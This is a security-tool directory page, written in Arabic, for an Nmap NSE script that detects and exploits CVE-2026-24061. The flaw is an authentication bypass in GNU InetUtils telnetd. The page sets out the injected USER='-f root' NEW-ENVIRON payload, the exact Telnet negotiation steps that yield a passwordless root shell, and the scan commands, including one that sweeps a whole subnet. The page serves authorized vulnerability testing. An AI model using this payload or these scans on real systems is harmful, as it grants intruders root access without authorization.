Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061-NSE — البرنامج النصي ينفّذ تفاوض Telnet كاملاً يحاكي التسلسل الدقيق للبايتات في جلسة عميل telnet -a حقيقية. | Kitploit
أدوات/GitHubGitHub/hd0x01/cve-2026-24061-nse
ماسحات الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالمصادقة
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

البرنامج النصي ينفّذ تفاوض Telnet كاملاً يحاكي التسلسل الدقيق للبايتات في جلسة عميل telnet -a حقيقية.

عرض المستودع
7منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061 — تجاوز المصادقة في GNU InetUtils telnetd

سكربت كشف Nmap NSE

Nmap NSE CVE CVSSv3 License


نظرة عامة

يكتشف سكربت Nmap NSE هذا ثغرة CVE-2026-24061، وهي ثغرة تجاوز مصادقة في GNU InetUtils telnetd الإصدارات 1.9.3 حتى 2.7.

من خلال إرسال متغير بيئة USER مُصمم خصيصًا بالصيغة -f <username> أثناء مفاوضات خيارات Telnet، يمكن لمهاجم غير مصادق الحصول على شل بصلاحيات المستخدم المحلي المحدد — بما في ذلك — .

root
دون تقديم أي كلمة مرور

الاستخدام المقصود: اختبار الاختراق المصرح به وتقييم الثغرات الأمنية فقط.
تشغيل هذا السكربت ضد أنظمة دون إذن كتابي صريح يُعد غير قانوني.


تفاصيل الثغرة

الحقلالقيمة
معرّف CVECVE-2026-24061
المتأثرGNU InetUtils telnetd 1.9.3 – 2.7
درجة CVSSv39.8 حرجة
ناقل الهجومCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
النوعتجاوز مصادقة (CWE-287)
تاريخ الإفصاح2026-01-01

كيف تعمل الثغرة

يستخدم telnetd في GNU InetUtils خيار Telnet NEW-ENVIRON (RFC 1572) لاستقبال متغيرات البيئة من العميل أثناء مرحلة المفاوضات. ثم يتم استدعاء برنامج login(1) مع تلك المتغيرات.

تنشأ الثغرة لأن telnetd يمرر متغير USER مباشرة إلى login دون تنظيفه. يقبل برنامج login على Linux علامة -f <user> بمعنى "مصادق عليه مسبقًا، لا تتحقق من كلمة المرور". من خلال حقن USER="-f root" عبر حمولة NEW-ENVIRON، يتجاوز المهاجم المصادقة بالكامل.

root@kitploit:~
Client → Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Server response:  spawns login -f root  →  root shell, no password required

تفاصيل السكربت

الحقلالقيمة
اسم الملفtelnet-vuln-cve-2026-24061.nse
الفئاتvuln, exploit, intrusive
المنفذTCP/23 (telnet)
تم اختباره علىNmap 7.94 / 7.98, Windows & Linux

طريقة الكشف

يقوم السكربت بـمفاوضات Telnet كاملة تحاكي التسلسل البايتي الدقيق لجلسة عميل telnet -a حقيقية (أُعيد بناؤها من التقاط Wireshark):

  1. استقبال دفعة IAC الافتتاحية من الخادم (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. الرد بإعلان قدرات العميل الكامل (WILL TTYPE, WILL LINEMODE, …)
  3. إكمال جولة التفاوض الفرعي (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. حقن USER='-f <user>' مُصمم خصيصًا في حمولة NEW-ENVIRON IS
  5. إكمال تسلسل WILL ECHO / DO BINARY / WONT LINEMODE
    (حرج — بدونه، لا يمكن لـ telnetd إنهاء إعداد PTY)
  6. التحقق مما إذا كان الخادم يرسل موجه شل تسجيل الدخول دون طلب كلمة مرور

حالات النتائج:

الحالةالمعنى
EXPLOITتم استلام موجه الشل — تم تأكيد التجاوز
LIKELY_VULNتم قبول حمولة ENV، لا موجه كلمة مرور، لكن لا موجه شل
NOT_VULNظهر موجه كلمة المرور، أو لم تكتمل المفاوضات

التثبيت

Linux

root@kitploit:~
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Update script database
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Update script database (run as Administrator)
nmap --script-updatedb

الاستخدام

فحص أساسي (المستخدم الافتراضي: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <target>

تحديد مستخدم مختلف

root@kitploit:~
# Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>

# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>

# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <target>

فحص نطاق عناوين IP

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

إخراج مفصّل / تصحيح

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <target>   # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <target>   # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target>   # full hex trace

نموذج الإخراج

مضيف ثغرة

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentication Bypass
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
|       authentication bypass via a crafted USER environment variable.
|       Sending '-f <user>' results in an unauthenticated login shell.
|     Extra information:
|       Authentication bypassed: shell prompt received after injecting
|       USER='-f root' -- no password challenge was presented.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

مضيف غير ثغرة

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(لا يوجد إخراج للسكربت — NOT_VULN صامت حسب التصميم، وفقًا لاتفاقية Nmap القياسية)


وسائط السكربت

الوسيطالأسماء المستعارةالافتراضيالوصف
telnet-vuln-cve-2026-24061.usertelnet-user, userrootاسم المستخدم للحقن عبر -f

ملاحظات تقنية

لماذا WONT LINEMODE حرج

يستخدم telnetd في GNU InetUtils مفاوضات Linemode (RFC 1184) لتحديد وضع الإدخال/الإخراج الطرفي. يرسل الخادم DO LINEMODE مبكرًا في المفاوضات، ويستجيب العميل في البداية بـ WILL LINEMODE. بعد تبادل حمولة ENV، يرسل الخادم WILL ECHO متبوعًا بـ DO BINARY. في هذه المرحلة يجب على العميل الرد بـ WONT LINEMODE للإشارة إلى وضع حرف-ب-حرف — عندها فقط يمكن لـ telnetd إكمال إعداد PTY (ioctl TIOCSWINSZ) وتفرع login. بدون هذه الخطوة، يسجل الخادم peer died: Inappropriate ioctl for device ويسقط الاتصال.

واجهة NSE Socket API

تختلف واجهة NSE socket API في Nmap عن اصطلاحات Lua socket القياسية:

root@kitploit:~
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string

المراجع

  • NVD — CVE-2026-24061
  • PoC by JayGLXR
  • PoC by SafeBreach-Labs
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Nmap NSE Documentation

إخلاء المسؤولية

تم توفير هذا السكربت لأغراض اختبار الأمان والبحث المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. احصل دائمًا على إذن كتابي صريح قبل اختبار أنظمة لا تملكها.

تنزيل الأداة